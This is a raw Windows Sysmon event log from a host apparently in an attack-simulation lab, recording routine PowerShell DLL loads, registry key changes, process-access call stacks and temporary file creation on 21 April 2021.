734700x80000000000000001529999Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationucrtbase_clr0400.dllMD5=F8F171BE1820544E15B555847005355C,SHA256=CDDF9A2BF085AE59BA464B3BA6394AACFC342DA5F17D77FD5306054C8AABF153trueMicrosoft CorporationValid 734700x80000000000000001529998Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=63936588122BDEE9624D02CE3F8F54EA,SHA256=21F7E6165CE8DD92DB8CDF48CEE83DE64B2B0807B7B499CF87678B70C6F8C32FtrueMicrosoft CorporationValid 13241300x80000000000000001529997Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.484{21761711-83A4-607D-0100-00000000BB01}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQWORD (0x01d736d3-0xf9a1c8db) 12241200x80000000000000001529996Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.484{21761711-83A4-607D-0100-00000000BB01}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll 734700x80000000000000001529995Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll4.8.4311.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=2C6E4402268C1CCB8FFF2FC7F7BD27E0,SHA256=9B01E4FC480D60A22D62EFEF9857A4371C826DCE8DED10C9E89F3224EF4526E6trueMicrosoft CorporationValid 734700x80000000000000001529994Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 734700x80000000000000001529993Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValid 13241300x80000000000000001529992Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.484{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\JumplistData\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\WindowsPowerShell\v1.0\powershell.exeQWORD (0x01d736d3-0xf9a1c8db) 
12241200x80000000000000001529991Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.484{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps 12241200x80000000000000001529990Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.484{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\JumplistData 10341000x80000000000000001529989Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}3886016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141a87|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529988Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}3886016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1419f2|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529987Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}3886016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
 10341000x80000000000000001529986Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}3886016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529985Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}3886016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+171086|C:\Windows\System32\windows.storage.dll+14130c|C:\Windows\System32\windows.storage.dll+1410e8|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529984Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}3886016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+171074|C:\Windows\System32\windows.storage.dll+14130c|C:\Windows\System32\windows.storage.dll+1410e8|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529983Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}3886016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+171074|C:\Windows\System32\windows.storage.dll+14130c|C:\Windows\System32\windows.storage.dll+1410e8|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001529982Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}388WIN-HOST-5\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFb312f3e.TMPMD5=7EFF1DDF55D96F0016BF7AC05D7CA59D,SHA256=E8AA506D87C0E68F6486C75A720FB88EDAAEE9A75D326373BCDCB164E618A3A8falsefalse - insufficient disk space 11241100x80000000000000001529981Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFb312f3e.TMP2021-04-21 17:30:08.484 734700x80000000000000001529980Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ntmarta.dll10.0.14393.0 (rs1_release.160715-1616)Windows NT MARTA providerMicrosoft® Windows® Operating SystemMicrosoft Corporationntmarta.dllMD5=854A3CAE7C97B630158C9F7EE8555970,SHA256=20F0A4D99C5095A0CAC39B816BFC987F64CD051843C79E027714666375986176trueMicrosoft WindowsValid 254200x80000000000000001529979Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5C9J3NFXGAY8QJS8VTR6.temp2021-04-19 12:25:37.5782021-04-21 17:30:08.484 11241100x80000000000000001529978Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5C9J3NFXGAY8QJS8VTR6.temp2021-04-21 17:30:08.484 734700x80000000000000001529977Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.469{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001529976Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.469{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cscapi.dll10.0.14393.0 (rs1_release.160715-1616)Offline Files Win32 APIMicrosoft® Windows® Operating 
SystemMicrosoft Corporationcscapi.dllMD5=6433F8201BFB449DC6B47F6999C2F164,SHA256=06729F1E0A0596620B48B6DC4A2CC9CC5FE55B17BD488C71F7F15AA4262C8C14trueMicrosoft WindowsValid 18141800x80000000000000001529975Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:08.469{21761711-6120-6080-BB5D-00000000BB01}388\srvsvcC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 734700x80000000000000001529974Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.469{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 734700x80000000000000001529973Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.469{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x80000000000000001529972Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.469{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ntshrui.dll10.0.14393.4169 (rs1_release.210107-1130)Shell extensions for sharingMicrosoft® Windows® Operating SystemMicrosoft Corporationntshrui.dllMD5=E996A5D4EA7754FF1B0411F0B1664603,SHA256=B2DA0AC549C551A2CAF0714EF3B344C33943292FB1FA9F2EEFA706B6FF18F1A2trueMicrosoft WindowsValid 
10341000x80000000000000001529971Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.469{21761711-83AD-607D-0C00-00000000BB01}7243060C:\Windows\system32\svchost.exe{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001529970Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.453{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\linkinfo.dll10.0.14393.0 (rs1_release.160715-1616)Windows Volume TrackingMicrosoft® Windows® Operating SystemMicrosoft CorporationLINKINFO.DLLMD5=4CE9B67A187310E37E535FC4165E0933,SHA256=469B33A5DDAA93D28F66AE6D6956268F6F2F09F146734D00A931FBDD1D87DE42trueMicrosoft WindowsValid 734700x80000000000000001529969Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.453{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\BCP47Langs.dll10.0.14393.2457 (rs1_release_inmarket.180822-1743)BCP47 Language ClassesMicrosoft® Windows® Operating SystemMicrosoft CorporationBCP47Lang.dllMD5=F688C2B9DD2EB56C3B0312B6380338AA,SHA256=B22DB210486D3B5F4EEB17900C5E7AA0EEFEDBB068A0C4858EFE9F8018C34628trueMicrosoft 
WindowsValid 734700x80000000000000001529968Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.453{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=013D2BA96C261CDC62ECA7365E1C84D5,SHA256=26896478B6F1AF3756D5B1BB59BF2C6BE1C579B122CC882BAC35FEFB3EC3EE36trueMicrosoft WindowsValid 734700x80000000000000001529967Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.453{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\userenv.dll10.0.14393.3986 (rs1_release.201002-1707)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=047D26DCED07A10913C3E7C3A7502BED,SHA256=143C661F79AC6BB271452A10C2A19F6B1AAAAE43B4062B6CFF173F7D8ABC40FEtrueMicrosoft WindowsValid 734700x80000000000000001529966Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.453{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x80000000000000001529965Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.453{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\shell32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft 
CorporationSHELL32.DLLMD5=E6D716FCDD7A5E7897267CDCED7D3EA3,SHA256=763990AA9286C3D945B6F0D617D3EB22CE88804AC3847F27A90509F813D77FD3trueMicrosoft WindowsValid 734700x80000000000000001529964Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.453{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x80000000000000001529963Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.453{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x80000000000000001529962Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.453{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x80000000000000001529961Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.453{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper 
DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x80000000000000001529960Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.453{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\windows.storage.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=902EBA937960538CA5B7A586EAFE47EE,SHA256=0C5D100EFA1E51C36C0A6E4B35BFD09C3098616EE9B3E46DC49E9E1A8365A0DFtrueMicrosoft WindowsValid 734700x80000000000000001529959Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.453{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValid 10341000x80000000000000001529958Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.451{21761711-83AE-607D-1600-00000000BB01}11084896C:\Windows\system32\svchost.exe{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529957Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:08.451{21761711-83AE-607D-1600-00000000BB01}11081152C:\Windows\system32\svchost.exe{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001529956Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.451{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValid 734700x80000000000000001529955Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.450{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 